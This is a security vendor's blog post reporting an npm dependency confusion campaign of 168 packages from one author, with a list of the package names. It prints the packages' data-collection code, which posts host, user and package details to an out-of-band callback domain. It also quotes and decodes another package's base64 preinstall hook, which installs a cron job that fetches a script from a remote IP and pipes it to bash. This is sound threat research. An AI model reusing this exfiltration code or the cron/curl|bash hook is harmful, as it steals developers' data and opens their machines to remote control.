
Single Author Uploaded 168 Packages to npm as Part of a Massive Dependency Confusion Attack


Using Mend Supply Chain Defender, Mend’s research team reported and blocked dozens of packages from the same author. These packages targeted developers of many companies and frameworks, including Slack, Cloudflare, Datadog, MetaMask, React, Shopify, OpenSea, Angular and more.

A dependency confusion attack takes advantage of the tendency of a developer’s package manager to pull a package from a public registry rather than an internal one when both carry the same name. It is one of the most effective attack techniques, because it is very easy for a programmer to import a malicious package from an open source registry that has an identical name to the internal package the programmer intended to use.

What Happened?

One npm user named ’amgadesam007’ uploaded 168 packages to npm, targeting various companies and frameworks. The actor was active from June 15 until he was taken down today, June 20. In this time frame, many packages were uploaded with names like:
‘slack-notifications’
‘Atomic-angular’
‘Cloudflare-docs-engine’
‘Datadog-app’
‘Metamask-state-log-explorer’
‘Shopify-marketplaces-buyer-app’
‘opensea-creatures’

As the first comment in index.js suggests, the uploader is a security researcher who goes by the name mega7 on HackerOne.

Although the uploader is a security researcher, that does not change the fact that these packages are malicious. They collect sensitive information and send it out through Interactsh or Pipedream.

All packages share similar code and intend to exfiltrate user information:

const os = require("os");
const dns = require("dns");
const querystring = require("querystring");
// packageJSON is the installed package's parsed package.json and package is its name
const packageJSON = require("./package.json");
const package = packageJSON.name;

// Collect identifying details about the machine and the install context
const trackingData = JSON.stringify({
    p: package,                   // package name
    c: __dirname,                 // install directory
    hd: os.homedir(),             // home directory
    hn: os.hostname(),            // hostname
    un: os.userInfo().username,   // local username
    dns: dns.getServers(),        // configured DNS resolvers
    r: packageJSON ? packageJSON.___resolved : undefined,
    v: packageJSON.version,
    pjson: packageJSON,           // the whole package.json
});

var postData = querystring.stringify({
    msg: trackingData,
});

// Request parameters for the out-of-band callback host that receives the data
var options = {
    // replace burpcollaborator.net with Interactsh or pipedream
    hostname: "cam9ar8b19p23s0tg6mgxppawdjkggiun.interact.sh",
    port: 443,
    path: "/",
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded",
        "Content-Length": postData.length,
    },
};


List of malicious packages categorized and sorted alphabetically


Crypto:

0x-fee-wrapper-contract
agoric-servers
alpaca-oas
blockchain-classic-wallet
blockchain-wallet-ios
chain-desktop-wallet
client-sdk-contract-tests
contract-metadata
crypto-com-chain-wallet
dapp-inter
dapp-inter-agservers
eth-faucet
ethers-js-snap
metadata-api-nodejs
metamask
metamask-docs
metamask-state-log-explorer
nft-tickets-workshop
nft-tutorial
opensea-creatures
opensea-erc1155
opensea-ships-log
wallet-options

Shopify:

polaris-for-figma
polaris-for-vscode
shopify-cli-extensions-test-utils
shopify-marketplaces-buyer-app

Cloudflare:

cloudflare-docs
cloudflare-docs-engine
do-worker
doom-workers
doom-workers-site
launchdarkly-cloudflare-worker-template
research.cloudflare.com
workers-airtable-form
workers-airtable-form-handler
workers.cloudflare.com
workerskv.gui

Intercom:

intercom-react-native-example
intercom-react-native.podspec
io.intercom.cordova.sample

Zendesk:

zcli-monorepo

Github:

action-create-release-pr
action-prebuildify
action-publish-gh-pages
action-require-additional-reviewer
assign-issue
assign-pr
Contributor-site
git-dependency-maker

Frontend:

atomic-angular
atomic-next
cli-e2e
cloudinary-sample-angular
custom-pages-react-boilerplate
example-api-routes
example-google-analytics
git-gatsby
react-datepicker-docs
react-jesting-library
react-ldclient-default-values
react-native-performance-monorepo
redux-data-model-documentation
Vuestic-admin
webpack-vue-config

Datadog:

dapp-inter-ui
datadog-agent-github-action
datadog-app
datadog-app-example-random-dog-dog-image-widget
datadog-app-example-sentiment
datadog-app-example-stream-admin
datadog-app-sentiment
datadog-app-stream-admin
datadog-app-template
datadog-datadog_agent
datadog-synthetics-github-action
Dd-opentracing-cpp
dd-sdk-reactnative-example


Others:

adelphi-api
apps-showcase
appsec-event-rules-tools
ashion-ingest
astrajs
atomic-angular
atomic-next
attention-editor
babel-preset-es201
bakaman
boilerplate-fig-autocomplete
cdcrep-docs
cli-e2e
cloudinary-sample-angular
collection-events-discord-webhook
com.natw.secret_store_example
contentsource-connector
cs-task-runner
custom-pages-react-boilerplate
discount-functions-sample-app
discourse-prepend-tags-in-topic-slug
dummy_app
epam-assets
epam-promo
example-api-routes
example-google-analytics
example-rust
example-typescript
eyeglass-embroider-app
files_pdfviewer
flipper-plugin-ribtree
generator-connection
git-gatsby
heft-component-rig
helix-contentsource-connector
helix-rum-collector
helix-run-query
helix-slack-notification
helix-status-service
helloreactnative
hydrogen-monorepo
iframe-execution-environment
integration-framework
launchdarkly-api-typescript-sample
manualtestapp
mapray-js-monorepo
matic-docs
megaman-007mega
megaman0072
megamanz07007
miew-ap
miew-cli
minicom-node
minis-samples
module-worker
new-npm-packages
nnabla-browser
nodejs-driver
npm-mega
pages-plugins
pagespeed-server
pcln-types
plasma-website
platform-client
prerelease-registry
procore-sample-ror
proof-generation-api
pulsar-sink-docs
react-datepicker-docs
react-jesting-library
react-ldclient-default-values
react-native-performance-monorepo
redux-data-model-documentation
remote-ui
reorgs-frontend
rnskia
ruby-style-guide
sample-mini
sdk_repl_app
sdk-release
share-service-client
slack-notification
slint-config-nodejs
snapcanvas-sdk
spaces-design
stargate-docs
template-snap-monorepo
th-simple-keyring
theme-whale-light
timebase-web-admin
twofactor_totp
typescript-snap
ui-extensions-dev-console-app
upgrade-challenge
upload-dsyms-github-action
v3-monorepo
vuestic-admin
web-scripts-monorepo
web-sdk-mono-repo
webpack-vue-config
Wwi-app
xp-ui


In addition to the above attack, Mend’s research team detected and reported the package ‘@xunlie/vue-context-menu’ (by another author), version 1.0.3, which adds a base64-encoded remote shell command to the crontab. Crontab is the Linux tool for managing the job scheduler known as cron, which executes tasks on a schedule.

At the time of writing, this package is still live on npm.

"preinstall": "node -e \"require('child_process').exec(Buffer.from('KCBjcm9udGFiIC1sOyBlY2hvICIqLzEgKiAqICogKiBjdXJsIC0tY29ubmVjdC10aW1lb3V0IDEwIGh0dHA6Ly80Ny45My4xMzMuNjQvbnBtLmpzb258YmFzaCAgPiAvZGV2L251bGwgMj4mMSIgKSB8IGNyb250YWIK', 'base64').toString('ascii'))\""

The preinstall script as it appears in package.json.

Decoded from base64, the intention of the code becomes clear:

( crontab -l; echo "*/1 * * * * curl --connect-timeout 10 http://47.93.133.64/npm.json|bash  > /dev/null 2>&1" ) | crontab

It registers a new cron job that runs every minute, tries to fetch content from the remote host and pipes that content to bash. Once that succeeds, a remote shell is opened.

How to protect your organization from supply chain attacks

Supply chain attacks evolve and grow more frequent each day. Dependency confusion attack attempts are very common. The easiest way to protect this attack surface is to use an automated supply chain security solution such as Mend Supply Chain Defender that informs you when you import a malicious package from open source registries. 

Mend enterprise customers using JFrog Artifactory as a private repository manager can prevent malicious open source software from entering their code base using the Mend Supply Chain Defender integration with JFrog Artifactory.

Learn how Mend Supply Chain Defender blocks software supply chain attacks.

Meet The Author

Tamir Ben Ari

Tamir Ben Ari is a malware researcher at Mend, investigating malicious behaviors such as typosquatting attacks, malicious takeovers, ATO attacks, Makefile pollution, Bitcoin mining, environment and credential-stealing, and dependency confusion. Previously, he held the role of security researcher at Mend, which included detailed vulnerability research in open source libraries.
